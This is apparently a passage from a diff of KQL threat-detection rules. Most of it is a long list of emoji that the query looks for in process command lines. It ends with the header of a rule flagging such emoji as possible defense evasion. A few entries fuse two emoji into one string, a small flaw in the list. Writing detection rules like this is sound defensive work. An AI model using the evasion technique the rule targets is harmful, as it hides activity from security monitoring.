ProcessCommandLine contains "✨" or ProcessCommandLine contains "⚡️" or ProcessCommandLine contains "☄️" or ProcessCommandLine contains "💥" or ProcessCommandLine contains "🔥" or ProcessCommandLine contains "🌪" or ProcessCommandLine contains "🌈" or ProcessCommandLine contains "☀️" or ProcessCommandLine contains "🌤" or ProcessCommandLine contains "⛅️" or ProcessCommandLine contains "🌥" or ProcessCommandLine contains "☁️" or 
ProcessCommandLine contains "🌦" or ProcessCommandLine contains "🌧" or ProcessCommandLine contains "⛈" or ProcessCommandLine contains "🌩" or ProcessCommandLine contains "🌨" or ProcessCommandLine contains "❄️" or ProcessCommandLine contains "☃️" or ProcessCommandLine contains "⛄️" or ProcessCommandLine contains "🌬" or ProcessCommandLine contains "💨" or ProcessCommandLine contains "💧" or ProcessCommandLine contains "💦" or ProcessCommandLine contains "🫧" or ProcessCommandLine contains "☔️" or ProcessCommandLine contains "☂️" or ProcessCommandLine contains "🌊" or ProcessCommandLine contains "🌫🍏" or ProcessCommandLine contains "🍎" or ProcessCommandLine contains "🍐" or ProcessCommandLine contains "🍊" or ProcessCommandLine contains "🍋" or ProcessCommandLine contains "🍌" or ProcessCommandLine contains "🍉" or ProcessCommandLine contains "🍇" or ProcessCommandLine contains "🍓" or ProcessCommandLine contains "🫐" or ProcessCommandLine contains "🍈" or ProcessCommandLine contains "🍒" or ProcessCommandLine contains "🍑" or ProcessCommandLine contains "🥭" or ProcessCommandLine contains "🍍" or ProcessCommandLine contains "🥥" or ProcessCommandLine contains "🥝" or ProcessCommandLine contains "🍅" or ProcessCommandLine contains "🍆" or ProcessCommandLine contains "🥑" or ProcessCommandLine contains "🥦" or ProcessCommandLine contains "🥬" or ProcessCommandLine contains "🥒" or ProcessCommandLine contains "🌶" or ProcessCommandLine contains "🫑" or ProcessCommandLine contains "🌽" or ProcessCommandLine contains "🥕" or ProcessCommandLine contains "🫒" or ProcessCommandLine contains "🧄" or ProcessCommandLine contains "🧅" or ProcessCommandLine contains "🥔" or ProcessCommandLine contains "🍠" or ProcessCommandLine contains "🫘" or ProcessCommandLine contains "🥐" or ProcessCommandLine contains "🥯" or ProcessCommandLine contains "🍞" or ProcessCommandLine contains "🥖" or ProcessCommandLine contains "🥨" or ProcessCommandLine contains "🧀" or ProcessCommandLine contains "🥚" or ProcessCommandLine contains "🍳" 
or ProcessCommandLine contains "🧈" or ProcessCommandLine contains "🥞" or ProcessCommandLine contains "🧇" or ProcessCommandLine contains "🥓" or ProcessCommandLine contains "🥩" or ProcessCommandLine contains "🍗" or ProcessCommandLine contains "🍖" or ProcessCommandLine contains "🦴" or ProcessCommandLine contains "🌭" or ProcessCommandLine contains "🍔" or ProcessCommandLine contains "🍟" or ProcessCommandLine contains "🍕" or ProcessCommandLine contains "🫓" or ProcessCommandLine contains "🥪" or ProcessCommandLine contains "🥙" or ProcessCommandLine contains "🧆" or ProcessCommandLine contains "🌮" or ProcessCommandLine contains "🌯" or ProcessCommandLine contains "🫔" or ProcessCommandLine contains "🥗" or ProcessCommandLine contains "🥘" or ProcessCommandLine contains "🫕" or ProcessCommandLine contains "🥫" or ProcessCommandLine contains "🍝" or ProcessCommandLine contains "🍜" or ProcessCommandLine contains "🍲" or ProcessCommandLine contains "🍛" or ProcessCommandLine contains "🍣" or ProcessCommandLine contains "🍱" or ProcessCommandLine contains "🥟" or ProcessCommandLine contains "🦪" or ProcessCommandLine contains "🍤" or ProcessCommandLine contains "🍙" or ProcessCommandLine contains "🍚" or ProcessCommandLine contains "🍘" or ProcessCommandLine contains "🍥" or ProcessCommandLine contains "🥠" or ProcessCommandLine contains "🥮" or ProcessCommandLine contains "🍢" or ProcessCommandLine contains "🍡" or ProcessCommandLine contains "🍧" or ProcessCommandLine contains "🍨" or ProcessCommandLine contains "🍦" or ProcessCommandLine contains "🥧" or ProcessCommandLine contains "🧁" or ProcessCommandLine contains "🍰" or ProcessCommandLine contains "🎂" or ProcessCommandLine contains "🍮" or ProcessCommandLine contains "🍭" or ProcessCommandLine contains "🍬" or ProcessCommandLine contains "🍫" or ProcessCommandLine contains "🍿" or ProcessCommandLine contains "🍩" or ProcessCommandLine contains "🍪" or ProcessCommandLine contains "🌰" or ProcessCommandLine contains "🥜" or ProcessCommandLine contains "🍯" or 
ProcessCommandLine contains "🥛" or ProcessCommandLine contains "🍼" or ProcessCommandLine contains "🫖" or ProcessCommandLine contains "☕️" or ProcessCommandLine contains "🍵" or ProcessCommandLine contains "🧃" or ProcessCommandLine contains "🥤" or ProcessCommandLine contains "🧋" or ProcessCommandLine contains "🫙" or ProcessCommandLine contains "🍶" or ProcessCommandLine contains "🍺" or ProcessCommandLine contains "🍻" or ProcessCommandLine contains "🥂" or ProcessCommandLine contains "🍷" or ProcessCommandLine contains "🫗" or ProcessCommandLine contains "🥃" or ProcessCommandLine contains "🍸" or ProcessCommandLine contains "🍹" or ProcessCommandLine contains "🧉" or ProcessCommandLine contains "🍾" or ProcessCommandLine contains "🧊" or ProcessCommandLine contains "🥄" or ProcessCommandLine contains "🍴" or ProcessCommandLine contains "🍽" or ProcessCommandLine contains "🥣" or ProcessCommandLine contains "🥡" or ProcessCommandLine contains "🥢" or ProcessCommandLine contains "🧂" or ProcessCommandLine contains "⚽️" or ProcessCommandLine contains "🏀" or ProcessCommandLine contains "🏈" or ProcessCommandLine contains "⚾️" or ProcessCommandLine contains "🥎" or ProcessCommandLine contains "🎾" or ProcessCommandLine contains "🏐" or ProcessCommandLine contains "🏉" or ProcessCommandLine contains "🥏" or ProcessCommandLine contains "🎱" or ProcessCommandLine contains "🪀" or ProcessCommandLine contains "🏓" or ProcessCommandLine contains "🏸" or ProcessCommandLine contains "🏒" or ProcessCommandLine contains "🏑" or ProcessCommandLine contains "🥍" or ProcessCommandLine contains "🏏" or ProcessCommandLine contains "🪃" or ProcessCommandLine contains "🥅" or ProcessCommandLine contains "⛳️" or ProcessCommandLine contains "🪁" or ProcessCommandLine contains "🏹" or ProcessCommandLine contains "🎣" or ProcessCommandLine contains "🤿" or ProcessCommandLine contains "🥊" or ProcessCommandLine contains "🥋" or ProcessCommandLine contains "🎽" or ProcessCommandLine contains "🛹" or ProcessCommandLine contains "🛼" or 
ProcessCommandLine contains "🛷" or ProcessCommandLine contains "⛸" or ProcessCommandLine contains "🥌" or ProcessCommandLine contains "🎿" or ProcessCommandLine contains "⛷" or ProcessCommandLine contains "🏂" or ProcessCommandLine contains "🪂" or ProcessCommandLine contains "🏋️‍♀️" or ProcessCommandLine contains "🏋️" or ProcessCommandLine contains "🏋️‍♂️" or ProcessCommandLine contains "🤼‍♀️" or ProcessCommandLine contains "🤼" or ProcessCommandLine contains "🤼‍♂️" or ProcessCommandLine contains "🤸‍♀️" or ProcessCommandLine contains "🤸" or ProcessCommandLine contains "🤸‍♂️" or ProcessCommandLine contains "⛹️‍♀️" or ProcessCommandLine contains "⛹️" or ProcessCommandLine contains "⛹️‍♂️" or ProcessCommandLine contains "🤺" or ProcessCommandLine contains "🤾‍♀️" or ProcessCommandLine contains "🤾" or ProcessCommandLine contains "🤾‍♂️" or ProcessCommandLine contains "🏌️‍♀️" or ProcessCommandLine contains "🏌️" or ProcessCommandLine contains "🏌️‍♂️" or ProcessCommandLine contains "🏇" or ProcessCommandLine contains "🧘‍♀️" or ProcessCommandLine contains "🧘" or ProcessCommandLine contains "🧘‍♂️" or ProcessCommandLine contains "🏄‍♀️" or ProcessCommandLine contains "🏄" or ProcessCommandLine contains "🏄‍♂️" or ProcessCommandLine contains "🏊‍♀️" or ProcessCommandLine contains "🏊" or ProcessCommandLine contains "🏊‍♂️" or ProcessCommandLine contains "🤽‍♀️" or ProcessCommandLine contains "🤽" or ProcessCommandLine contains "🤽‍♂️" or ProcessCommandLine contains "🚣‍♀️" or ProcessCommandLine contains "🚣" or ProcessCommandLine contains "🚣‍♂️" or ProcessCommandLine contains "🧗‍♀️" or ProcessCommandLine contains "🧗" or ProcessCommandLine contains "🧗‍♂️" or ProcessCommandLine contains "🚵‍♀️" or ProcessCommandLine contains "🚵" or ProcessCommandLine contains "🚵‍♂️" or ProcessCommandLine contains "🚴‍♀️" or ProcessCommandLine contains "🚴" or ProcessCommandLine contains "🚴‍♂️" or ProcessCommandLine contains "🏆" or ProcessCommandLine contains "🥇" or ProcessCommandLine contains "🥈" or 
ProcessCommandLine contains "🥉" or ProcessCommandLine contains "🏅" or ProcessCommandLine contains "🎖" or ProcessCommandLine contains "🏵" or ProcessCommandLine contains "🎗" or ProcessCommandLine contains "🎫" or ProcessCommandLine contains "🎟" or ProcessCommandLine contains "🎪" or ProcessCommandLine contains "🤹" or ProcessCommandLine contains "🤹‍♂️" or ProcessCommandLine contains "🤹‍♀️" or ProcessCommandLine contains "🎭" or ProcessCommandLine contains "🩰" or ProcessCommandLine contains "🎨" or ProcessCommandLine contains "🎬" or ProcessCommandLine contains "🎤" or ProcessCommandLine contains "🎧" or ProcessCommandLine contains "🎼" or ProcessCommandLine contains "🎹" or ProcessCommandLine contains "🥁" or ProcessCommandLine contains "🪘" or ProcessCommandLine contains "🎷" or ProcessCommandLine contains "🎺" or ProcessCommandLine contains "🪗" or ProcessCommandLine contains "🎸" or ProcessCommandLine contains "🪕" or ProcessCommandLine contains "🎻" or ProcessCommandLine contains "🎲" or ProcessCommandLine contains "♟" or ProcessCommandLine contains "🎯" or ProcessCommandLine contains "🎳" or ProcessCommandLine contains "🎮" or ProcessCommandLine contains "🎰" or ProcessCommandLine contains "🧩" or ProcessCommandLine contains "🚗" or ProcessCommandLine contains "🚕" or ProcessCommandLine contains "🚙" or ProcessCommandLine contains "🚌" or ProcessCommandLine contains "🚎" or ProcessCommandLine contains "🏎" or ProcessCommandLine contains "🚓" or ProcessCommandLine contains "🚑" or ProcessCommandLine contains "🚒" or ProcessCommandLine contains "🚐" or ProcessCommandLine contains "🛻" or ProcessCommandLine contains "🚚" or ProcessCommandLine contains "🚛" or ProcessCommandLine contains "🚜" or ProcessCommandLine contains "🦯" or ProcessCommandLine contains "🦽" or ProcessCommandLine contains "🦼" or ProcessCommandLine contains "🛴" or ProcessCommandLine contains "🚲" or ProcessCommandLine contains "🛵" or ProcessCommandLine contains "🏍" or ProcessCommandLine contains "🛺" or ProcessCommandLine contains "🚨" 
or ProcessCommandLine contains "🚔" or ProcessCommandLine contains "🚍" or ProcessCommandLine contains "🚘" or ProcessCommandLine contains "🚖" or ProcessCommandLine contains "🛞" or ProcessCommandLine contains "🚡" or ProcessCommandLine contains "🚠" or ProcessCommandLine contains "🚟" or ProcessCommandLine contains "🚃" or ProcessCommandLine contains "🚋" or ProcessCommandLine contains "🚞" or ProcessCommandLine contains "🚝" or ProcessCommandLine contains "🚄" or ProcessCommandLine contains "🚅" or ProcessCommandLine contains "🚈" or ProcessCommandLine contains "🚂" or ProcessCommandLine contains "🚆" or ProcessCommandLine contains "🚇" or ProcessCommandLine contains "🚊" or ProcessCommandLine contains "🚉" or ProcessCommandLine contains "✈️" or ProcessCommandLine contains "🛫" or ProcessCommandLine contains "🛬" or ProcessCommandLine contains "🛩" or ProcessCommandLine contains "💺" or ProcessCommandLine contains "🛰" or ProcessCommandLine contains "🚀" or ProcessCommandLine contains "🛸" or ProcessCommandLine contains "🚁" or ProcessCommandLine contains "🛶" or ProcessCommandLine contains "⛵️" or ProcessCommandLine contains "🚤" or ProcessCommandLine contains "🛥" or ProcessCommandLine contains "🛳" or ProcessCommandLine contains "⛴" or ProcessCommandLine contains "🚢" or ProcessCommandLine contains "⚓️" or ProcessCommandLine contains "🛟" or ProcessCommandLine contains "🪝" or ProcessCommandLine contains "⛽️" or ProcessCommandLine contains "🚧" or ProcessCommandLine contains "🚦" or ProcessCommandLine contains "🚥" or ProcessCommandLine contains "🚏" or ProcessCommandLine contains "🗺" or ProcessCommandLine contains "🗿" or ProcessCommandLine contains "🗽" or ProcessCommandLine contains "🗼" or ProcessCommandLine contains "🏰" or ProcessCommandLine contains "🏯" or ProcessCommandLine contains "🏟" or ProcessCommandLine contains "🎡" or ProcessCommandLine contains "🎢" or ProcessCommandLine contains "🛝" or ProcessCommandLine contains "🎠" or ProcessCommandLine contains "⛲️" or ProcessCommandLine contains "⛱" 
or ProcessCommandLine contains "🏖" or ProcessCommandLine contains "🏝" or ProcessCommandLine contains "🏜" or ProcessCommandLine contains "🌋" or ProcessCommandLine contains "⛰" or ProcessCommandLine contains "🏔" or ProcessCommandLine contains "🗻" or ProcessCommandLine contains "🏕" or ProcessCommandLine contains "⛺️" or ProcessCommandLine contains "🛖" or ProcessCommandLine contains "🏠" or ProcessCommandLine contains "🏡" or ProcessCommandLine contains "🏘" or ProcessCommandLine contains "🏚" or ProcessCommandLine contains "🏗" or ProcessCommandLine contains "🏭" or ProcessCommandLine contains "🏢" or ProcessCommandLine contains "🏬" or ProcessCommandLine contains "🏣" or ProcessCommandLine contains "🏤" or ProcessCommandLine contains "🏥" or ProcessCommandLine contains "🏦" or ProcessCommandLine contains "🏨" or ProcessCommandLine contains "🏪" or ProcessCommandLine contains "🏫" or ProcessCommandLine contains "🏩" or ProcessCommandLine contains "💒" or ProcessCommandLine contains "🏛" or ProcessCommandLine contains "⛪️" or ProcessCommandLine contains "🕌" or ProcessCommandLine contains "🕍" or ProcessCommandLine contains "🛕" or ProcessCommandLine contains "🕋" or ProcessCommandLine contains "⛩" or ProcessCommandLine contains "🛤" or ProcessCommandLine contains "🛣" or ProcessCommandLine contains "🗾" or ProcessCommandLine contains "🎑" or ProcessCommandLine contains "🏞" or ProcessCommandLine contains "🌅" or ProcessCommandLine contains "🌄" or ProcessCommandLine contains "🌠" or ProcessCommandLine contains "🎇" or ProcessCommandLine contains "🎆" or ProcessCommandLine contains "🌇" or ProcessCommandLine contains "🌆" or ProcessCommandLine contains "🏙" or ProcessCommandLine contains "🌃" or ProcessCommandLine contains "🌌" or ProcessCommandLine contains "🌉" or ProcessCommandLine contains "🌁" or ProcessCommandLine contains "⌚️" or ProcessCommandLine contains "📱" or ProcessCommandLine contains "📲" or ProcessCommandLine contains "💻" or ProcessCommandLine contains "⌨️" or ProcessCommandLine contains "🖥" 
or ProcessCommandLine contains "🖨" or ProcessCommandLine contains "🖱" or ProcessCommandLine contains "🖲" or ProcessCommandLine contains "🕹" or ProcessCommandLine contains "🗜" or ProcessCommandLine contains "💽" or ProcessCommandLine contains "💾" or ProcessCommandLine contains "💿" or ProcessCommandLine contains "📀" or ProcessCommandLine contains "📼" or ProcessCommandLine contains "📷" or ProcessCommandLine contains "📸" or ProcessCommandLine contains "📹" or ProcessCommandLine contains "🎥" or ProcessCommandLine contains "📽" or ProcessCommandLine contains "🎞" or ProcessCommandLine contains "📞" or ProcessCommandLine contains "☎️" or ProcessCommandLine contains "📟" or ProcessCommandLine contains "📠" or ProcessCommandLine contains "📺" or ProcessCommandLine contains "📻" or ProcessCommandLine contains "🎙" or ProcessCommandLine contains "🎚" or ProcessCommandLine contains "🎛" or ProcessCommandLine contains "🧭" or ProcessCommandLine contains "⏱" or ProcessCommandLine contains "⏲" or ProcessCommandLine contains "⏰" or ProcessCommandLine contains "🕰" or ProcessCommandLine contains "⌛️" or ProcessCommandLine contains "⏳" or ProcessCommandLine contains "📡" or ProcessCommandLine contains "🔋" or ProcessCommandLine contains "🪫" or ProcessCommandLine contains "🔌" or ProcessCommandLine contains "💡" or ProcessCommandLine contains "🔦" or ProcessCommandLine contains "🕯" or ProcessCommandLine contains "🪔" or ProcessCommandLine contains "🧯" or ProcessCommandLine contains "🛢" or ProcessCommandLine contains "💸" or ProcessCommandLine contains "💵" or ProcessCommandLine contains "💴" or ProcessCommandLine contains "💶" or ProcessCommandLine contains "💷" or ProcessCommandLine contains "🪙" or ProcessCommandLine contains "💰" or ProcessCommandLine contains "💳" or ProcessCommandLine contains "💎" or ProcessCommandLine contains "⚖️" or ProcessCommandLine contains "🪜" or ProcessCommandLine contains "🧰" or ProcessCommandLine contains "🪛" or ProcessCommandLine contains "🔧" or ProcessCommandLine contains "🔨" 
or ProcessCommandLine contains "⚒" or ProcessCommandLine contains "🛠" or ProcessCommandLine contains "⛏" or ProcessCommandLine contains "🪚" or ProcessCommandLine contains "🔩" or ProcessCommandLine contains "⚙️" or ProcessCommandLine contains "🪤" or ProcessCommandLine contains "🧱" or ProcessCommandLine contains "⛓" or ProcessCommandLine contains "🧲" or ProcessCommandLine contains "🔫" or ProcessCommandLine contains "💣" or ProcessCommandLine contains "🧨" or ProcessCommandLine contains "🪓" or ProcessCommandLine contains "🔪" or ProcessCommandLine contains "🗡" or ProcessCommandLine contains "⚔️" or ProcessCommandLine contains "🛡" or ProcessCommandLine contains "🚬" or ProcessCommandLine contains "⚰️" or ProcessCommandLine contains "🪦" or ProcessCommandLine contains "⚱️" or ProcessCommandLine contains "🏺" or ProcessCommandLine contains "🔮" or ProcessCommandLine contains "📿" or ProcessCommandLine contains "🧿" or ProcessCommandLine contains "🪬" or ProcessCommandLine contains "💈" or ProcessCommandLine contains "⚗️" or ProcessCommandLine contains "🔭" or ProcessCommandLine contains "🔬" or ProcessCommandLine contains "🕳" or ProcessCommandLine contains "🩹" or ProcessCommandLine contains "🩺" or ProcessCommandLine contains "🩻" or ProcessCommandLine contains "🩼" or ProcessCommandLine contains "💊" or ProcessCommandLine contains "💉" or ProcessCommandLine contains "🩸" or ProcessCommandLine contains "🧬" or ProcessCommandLine contains "🦠" or ProcessCommandLine contains "🧫" or ProcessCommandLine contains "🧪" or ProcessCommandLine contains "🌡" or ProcessCommandLine contains "🧹" or ProcessCommandLine contains "🪠" or ProcessCommandLine contains "🧺" or ProcessCommandLine contains "🧻" or ProcessCommandLine contains "🚽" or ProcessCommandLine contains "🚰" or ProcessCommandLine contains "🚿" or ProcessCommandLine contains "🛁" or ProcessCommandLine contains "🛀" or ProcessCommandLine contains "🧼" or ProcessCommandLine contains "🪥" or ProcessCommandLine contains "🪒" or ProcessCommandLine contains "🧽" 
or ProcessCommandLine contains "🪣" or ProcessCommandLine contains "🧴" or ProcessCommandLine contains "🛎" or ProcessCommandLine contains "🔑" or ProcessCommandLine contains "🗝" or ProcessCommandLine contains "🚪" or ProcessCommandLine contains "🪑" or ProcessCommandLine contains "🛋" or ProcessCommandLine contains "🛏" or ProcessCommandLine contains "🛌" or ProcessCommandLine contains "🧸" or ProcessCommandLine contains "🪆" or ProcessCommandLine contains "🖼" or ProcessCommandLine contains "🪞" or ProcessCommandLine contains "🪟" or ProcessCommandLine contains "🛍" or ProcessCommandLine contains "🛒" or ProcessCommandLine contains "🎁" or ProcessCommandLine contains "🎈" or ProcessCommandLine contains "🎏" or ProcessCommandLine contains "🎀" or ProcessCommandLine contains "🪄" or ProcessCommandLine contains "🪅" or ProcessCommandLine contains "🎊" or ProcessCommandLine contains "🎉" or ProcessCommandLine contains "🪩" or ProcessCommandLine contains "🎎" or ProcessCommandLine contains "🏮" or ProcessCommandLine contains "🎐" or ProcessCommandLine contains "🧧" or ProcessCommandLine contains "✉️" or ProcessCommandLine contains "📩" or ProcessCommandLine contains "📨" or ProcessCommandLine contains "📧" or ProcessCommandLine contains "💌" or ProcessCommandLine contains "📥" or ProcessCommandLine contains "📤" or ProcessCommandLine contains "📦" or ProcessCommandLine contains "🏷" or ProcessCommandLine contains "🪧" or ProcessCommandLine contains "📪" or ProcessCommandLine contains "📫" or ProcessCommandLine contains "📬" or ProcessCommandLine contains "📭" or ProcessCommandLine contains "📮" or ProcessCommandLine contains "📯" or ProcessCommandLine contains "📜" or ProcessCommandLine contains "📃" or ProcessCommandLine contains "📄" or ProcessCommandLine contains "📑" or ProcessCommandLine contains "🧾" or ProcessCommandLine contains "📊" or ProcessCommandLine contains "📈" or ProcessCommandLine contains "📉" or ProcessCommandLine contains "🗒" or ProcessCommandLine contains "🗓" or ProcessCommandLine contains "📆" or 
ProcessCommandLine contains "📅" or ProcessCommandLine contains "🗑" or ProcessCommandLine contains "🪪" or ProcessCommandLine contains "📇" or ProcessCommandLine contains "🗃" or ProcessCommandLine contains "🗳" or ProcessCommandLine contains "🗄" or ProcessCommandLine contains "📋" or ProcessCommandLine contains "📁" or ProcessCommandLine contains "📂" or ProcessCommandLine contains "🗂" or ProcessCommandLine contains "🗞" or ProcessCommandLine contains "📰" or ProcessCommandLine contains "📓" or ProcessCommandLine contains "📔" or ProcessCommandLine contains "📒" or ProcessCommandLine contains "📕" or ProcessCommandLine contains "📗" or ProcessCommandLine contains "📘" or ProcessCommandLine contains "📙" or ProcessCommandLine contains "📚" or ProcessCommandLine contains "📖" or ProcessCommandLine contains "🔖" or ProcessCommandLine contains "🧷" or ProcessCommandLine contains "🔗" or ProcessCommandLine contains "📎" or ProcessCommandLine contains "🖇" or ProcessCommandLine contains "📐" or ProcessCommandLine contains "📏" or ProcessCommandLine contains "🧮" or ProcessCommandLine contains "📌" or ProcessCommandLine contains "📍" or ProcessCommandLine contains "✂️" or ProcessCommandLine contains "🖊" or ProcessCommandLine contains "🖋" or ProcessCommandLine contains "✒️" or ProcessCommandLine contains "🖌" or ProcessCommandLine contains "🖍" or ProcessCommandLine contains "📝" or ProcessCommandLine contains "✏️" or ProcessCommandLine contains "🔍" or ProcessCommandLine contains "🔎" or ProcessCommandLine contains "🔏" or ProcessCommandLine contains "🔐" or ProcessCommandLine contains "🔒" or ProcessCommandLine contains "🔓❤️" or ProcessCommandLine contains "🧡" or ProcessCommandLine contains "💛" or ProcessCommandLine contains "💚" or ProcessCommandLine contains "💙" or ProcessCommandLine contains "💜" or ProcessCommandLine contains "🖤" or ProcessCommandLine contains "🤍" or ProcessCommandLine contains "🤎" or ProcessCommandLine contains "❤️‍🔥" or ProcessCommandLine contains "❤️‍🩹" or ProcessCommandLine contains 
"💔" or ProcessCommandLine contains "❣️" or ProcessCommandLine contains "💕" or ProcessCommandLine contains "💞" or ProcessCommandLine contains "💓" or ProcessCommandLine contains "💗" or ProcessCommandLine contains "💖" or ProcessCommandLine contains "💘" or ProcessCommandLine contains "💝" or ProcessCommandLine contains "💟" or ProcessCommandLine contains "☮️" or ProcessCommandLine contains "✝️" or ProcessCommandLine contains "☪️" or ProcessCommandLine contains "🕉" or ProcessCommandLine contains "☸️" or ProcessCommandLine contains "✡️" or ProcessCommandLine contains "🔯" or ProcessCommandLine contains "🕎" or ProcessCommandLine contains "☯️" or ProcessCommandLine contains "☦️" or ProcessCommandLine contains "🛐" or ProcessCommandLine contains "⛎" or ProcessCommandLine contains "♈️" or ProcessCommandLine contains "♉️" or ProcessCommandLine contains "♊️" or ProcessCommandLine contains "♋️" or ProcessCommandLine contains "♌️" or ProcessCommandLine contains "♍️" or ProcessCommandLine contains "♎️" or ProcessCommandLine contains "♏️" or ProcessCommandLine contains "♐️" or ProcessCommandLine contains "♑️" or ProcessCommandLine contains "♒️" or ProcessCommandLine contains "♓️" or ProcessCommandLine contains "🆔" or ProcessCommandLine contains "⚛️" or ProcessCommandLine contains "🉑" or ProcessCommandLine contains "☢️" or ProcessCommandLine contains "☣️" or ProcessCommandLine contains "📴" or ProcessCommandLine contains "📳" or ProcessCommandLine contains "🈶" or ProcessCommandLine contains "🈚️" or ProcessCommandLine contains "🈸" or ProcessCommandLine contains "🈺" or ProcessCommandLine contains "🈷️" or ProcessCommandLine contains "✴️" or ProcessCommandLine contains "🆚" or ProcessCommandLine contains "💮" or ProcessCommandLine contains "🉐" or ProcessCommandLine contains "㊙️" or ProcessCommandLine contains "㊗️" or ProcessCommandLine contains "🈴" or ProcessCommandLine contains "🈵" or ProcessCommandLine contains "🈹" or ProcessCommandLine contains "🈲" or ProcessCommandLine contains "🅰️" or 
ProcessCommandLine contains "🅱️" or ProcessCommandLine contains "🆎" or ProcessCommandLine contains "🆑" or ProcessCommandLine contains "🅾️" or ProcessCommandLine contains "🆘" or ProcessCommandLine contains "❌" or ProcessCommandLine contains "⭕️" or ProcessCommandLine contains "🛑" or ProcessCommandLine contains "⛔️" or ProcessCommandLine contains "📛" or ProcessCommandLine contains "🚫" or ProcessCommandLine contains "💯" or ProcessCommandLine contains "💢" or ProcessCommandLine contains "♨️" or ProcessCommandLine contains "🚷" or ProcessCommandLine contains "🚯" or ProcessCommandLine contains "🚳" or ProcessCommandLine contains "🚱" or ProcessCommandLine contains "🔞" or ProcessCommandLine contains "📵" or ProcessCommandLine contains "🚭" or ProcessCommandLine contains "❗️" or ProcessCommandLine contains "❕" or ProcessCommandLine contains "❓" or ProcessCommandLine contains "❔" or ProcessCommandLine contains "‼️" or ProcessCommandLine contains "⁉️" or ProcessCommandLine contains "🔅" or ProcessCommandLine contains "🔆" or ProcessCommandLine contains "〽️" or ProcessCommandLine contains "⚠️" or ProcessCommandLine contains "🚸" or ProcessCommandLine contains "🔱" or ProcessCommandLine contains "⚜️" or ProcessCommandLine contains "🔰" or ProcessCommandLine contains "♻️" or ProcessCommandLine contains "✅" or ProcessCommandLine contains "🈯️" or ProcessCommandLine contains "💹" or ProcessCommandLine contains "❇️" or ProcessCommandLine contains "✳️" or ProcessCommandLine contains "❎" or ProcessCommandLine contains "🌐" or ProcessCommandLine contains "💠" or ProcessCommandLine contains "Ⓜ️" or ProcessCommandLine contains "🌀" or ProcessCommandLine contains "💤" or ProcessCommandLine contains "🏧" or ProcessCommandLine contains "🚾" or ProcessCommandLine contains "♿️" or ProcessCommandLine contains "🅿️" or ProcessCommandLine contains "🛗" or ProcessCommandLine contains "🈳" or ProcessCommandLine contains "🈂️" or ProcessCommandLine contains "🛂" or ProcessCommandLine contains "🛃" or ProcessCommandLine 
contains "🛄" or ProcessCommandLine contains "🛅" or ProcessCommandLine contains "🚹" or ProcessCommandLine contains "🚺" or ProcessCommandLine contains "🚼" or ProcessCommandLine contains "⚧" or ProcessCommandLine contains "🚻" or ProcessCommandLine contains "🚮" or ProcessCommandLine contains "🎦" or ProcessCommandLine contains "📶" or ProcessCommandLine contains "🈁" or ProcessCommandLine contains "🔣" or ProcessCommandLine contains "ℹ️" or ProcessCommandLine contains "🔤" or ProcessCommandLine contains "🔡" or ProcessCommandLine contains "🔠" or ProcessCommandLine contains "🆖" or ProcessCommandLine contains "🆗" or ProcessCommandLine contains "🆙" or ProcessCommandLine contains "🆒" or ProcessCommandLine contains "🆕" or ProcessCommandLine contains "🆓" or ProcessCommandLine contains "0️⃣" or ProcessCommandLine contains "1️⃣" or ProcessCommandLine contains "2️⃣" or ProcessCommandLine contains "3️⃣" or ProcessCommandLine contains "4️⃣" or ProcessCommandLine contains "5️⃣" or ProcessCommandLine contains "6️⃣" or ProcessCommandLine contains "7️⃣" or ProcessCommandLine contains "8️⃣" or ProcessCommandLine contains "9️⃣" or ProcessCommandLine contains "🔟" or ProcessCommandLine contains "🔢" or ProcessCommandLine contains "#️⃣" or ProcessCommandLine contains "️⃣" or ProcessCommandLine contains "⏏️" or ProcessCommandLine contains "▶️" or ProcessCommandLine contains "⏸" or ProcessCommandLine contains "⏯" or ProcessCommandLine contains "⏹" or ProcessCommandLine contains "⏺" or ProcessCommandLine contains "⏭" or ProcessCommandLine contains "⏮" or ProcessCommandLine contains "⏩" or ProcessCommandLine contains "⏪" or ProcessCommandLine contains "⏫" or ProcessCommandLine contains "⏬" or ProcessCommandLine contains "◀️" or ProcessCommandLine contains "🔼" or ProcessCommandLine contains "🔽" or ProcessCommandLine contains "➡️" or ProcessCommandLine contains "⬅️" or ProcessCommandLine contains "⬆️" or ProcessCommandLine contains "⬇️" or ProcessCommandLine contains "↗️" or ProcessCommandLine 
contains "↘️" or ProcessCommandLine contains "↙️" or ProcessCommandLine contains "↖️" or ProcessCommandLine contains "↕️" or ProcessCommandLine contains "↔️" or ProcessCommandLine contains "↪️" or ProcessCommandLine contains "↩️" or ProcessCommandLine contains "⤴️" or ProcessCommandLine contains "⤵️" or ProcessCommandLine contains "🔀" or ProcessCommandLine contains "🔁" or ProcessCommandLine contains "🔂" or ProcessCommandLine contains "🔄" or ProcessCommandLine contains "🔃" or ProcessCommandLine contains "🎵" or ProcessCommandLine contains "🎶" or ProcessCommandLine contains "➕" or ProcessCommandLine contains "➖" or ProcessCommandLine contains "➗" or ProcessCommandLine contains "✖️" or ProcessCommandLine contains "🟰" or ProcessCommandLine contains "♾" or ProcessCommandLine contains "💲" or ProcessCommandLine contains "💱" or ProcessCommandLine contains "™️" or ProcessCommandLine contains "©️" or ProcessCommandLine contains "®️" or ProcessCommandLine contains "〰️" or ProcessCommandLine contains "➰" or ProcessCommandLine contains "➿" or ProcessCommandLine contains "🔚" or ProcessCommandLine contains "🔙" or ProcessCommandLine contains "🔛" or ProcessCommandLine contains "🔝" or ProcessCommandLine contains "🔜" or ProcessCommandLine contains "✔️" or ProcessCommandLine contains "☑️" or ProcessCommandLine contains "🔘" or ProcessCommandLine contains "🔴" or ProcessCommandLine contains "🟠" or ProcessCommandLine contains "🟡" or ProcessCommandLine contains "🟢" or ProcessCommandLine contains "🔵" or ProcessCommandLine contains "🟣" or ProcessCommandLine contains "⚫️" or ProcessCommandLine contains "⚪️" or ProcessCommandLine contains "🟤" or ProcessCommandLine contains "🔺" or ProcessCommandLine contains "🔻"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql
new file mode 100644
index 00000000..b8cabf92
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql
@@ -0,0 +1,10 @@
+// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-12-05
+// Level: high
+// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
